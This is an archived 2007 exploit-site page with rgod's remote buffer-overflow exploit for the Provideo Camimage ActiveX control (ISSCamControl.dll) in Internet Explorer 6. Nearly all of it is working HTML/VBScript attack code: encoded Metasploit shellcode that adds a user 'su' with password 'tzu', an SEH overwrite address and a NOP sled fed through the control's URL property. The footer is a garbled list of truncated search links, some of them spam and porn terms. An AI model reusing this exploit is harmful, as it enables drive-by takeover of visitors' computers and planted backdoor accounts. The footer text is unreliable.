about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , IE6 / Provideo Camimage (ISSCamControl.dll 1.0.1.5) Remote BoF Exploit




2007-06-03 IE6 / Provideo Camimage (ISSCamControl.dll 1.0.1.5) Remote BoF Exploit 
Rated as : Critical

<!-- IE6 / Provideo Camimage class (ISSCamControl.dll 1.0.1.5)
remote seh overwrite exploit / win2k sp4

tried the SD-222VPRO camera series,you can reach an online demo here:
http://www.provideo.com.tw/security%20live%20demo.htm

rgod
-->
<HTML>
<object classid='clsid:AA0FB75C-C50E-47B6-B7E0-3B9C3FAA8AC4'
id='Camimage' /></object>
<script language='vbscript'>

REM metasploit one, add a user 'su' with pass 'tzu'
shellcode   =
unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%49%49%49%49%49%49%37%49%49%49%49%49%49%49%49%49%49%49%51%5a%6a%44%58%50%30%41%30%41%6b%41%41%54%42%41%32%41%41%32%42%41%30%42%41%58%38%41%42%50%75%68%69%39%6c%38%68%31%54%43%30%47%70%57%70%4c%4b%30%45%77%4c%6e%6b%31%6c%47%75%51%68%43%31%48%6f%6c%4b%52%6f%75%48%4c%4b%63%6f%31%30%53%31%38%6b%71%59%6c%4b%36%54%6c%4b%47%71%48%6e%64%71%4f%30%4d%49%6c%6c%4e%64%4b%70%30%74%76%67%4a%61%39%5a%76%6d%55%51%6b%72%4a%4b%68%74%47%4b%70%54%35%74%55%54%61%65%6b%55%6c%4b%41%4f%77%54%34%41%48%6b%71%76%6e%6b%46%6c%62%6b%6e%6b%33%6f%77%6c%54%41%68%6b%6e%6b%57%6c%6c%4b%46%61%48%6b%4f%79%61%4c%71%34%56%64%48%43%54%71%4b%70%31%74%4c%4b%37%30%46%50%4f%75%4f%30%41%68%46%6c%6e%6b%43%70%46%6c%6c%4b%30%70%35%4c%6e%4d%4e%6b%50%68%35%58%68%6b%56%69%6c%4b%4b%30%6e%50%57%70%53%30%73%30%4e%6b%62%48%67%4c%43%6f%50%31%4a%56%51%70%36%36%6d%59%58%78%6d%53%49%50%33%4b%56%30%42%48%41%6e%58%58%6d%32%70%73%41%78%6f%68%69%6e%6f%7a%54%4e%42%77%49%6f%38%67%33%53%30%6d%75%34%41%30%66%4f%70%63%65%70%52%4e%43%55%31%64%31%30%74%35%33%43%63%55%51%62%31%30%51%63%41%65%47%50%32%54%30%7a%42%55%61%30%36%4f%30%61%43%54%71%74%35%70%57%56%65%70%70%6e%61%75%52%54%45%70%32%4c%70%6f%70%63%73%51%72%4c%32%47%54%32%32%4f%42%55%30%70%55%70%71%51%65%34%32%4d%62%49%50%6e%42%49%74%33%62%54%43%42%30%61%42%54%70%6f%50%72%41%63%67%50%51%63%34%35%77%50%66%4f%32%41%61%74%71%74%35%50%44")
+ NOP
seh_handler = unescape("%1e%16%e6%77") : REM 0x77e6161e call edi
user32.dll
nop         = string(96,unescape("%90"))
suntzu      = "http://www." + String(97,"a") +
seh_handler + nop + shellcode + nop + ".com"

Camimage.URL = suntzu

</script>
</HTML>

securitydot.net - 2007-06-03

Advertising

Copyright 2007, SecurityDot
Sat, 07 Nov 2009 20:05:08 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
remote roo sapid Doggystyle news for c NEWS CMS is Fre Www.Kannad mambo Remo mambo Remo sex2 mambo Remo CMS is Fre gajas nuas g00gle.com mambo Remo Tamilactre mambo Remo Www.pohner mambo Remo sales106.c LAMP insta remote roo 200 /compo PHP NUKE PHP NUKE PHP NUKE Free Sex i CMS is Fre www.sina-v news for c 200 /compo google xxl sex tv Se. news for c SuSE 2.4.2 mambo Remo www.zgrczp Sex vedio www.15save mirc 6.2 e tsyouxi.cn CMS is Fre www.xxx.co Video porn she sexey. xi.xiaoyoy www.indian CMS is Fre mambo Remo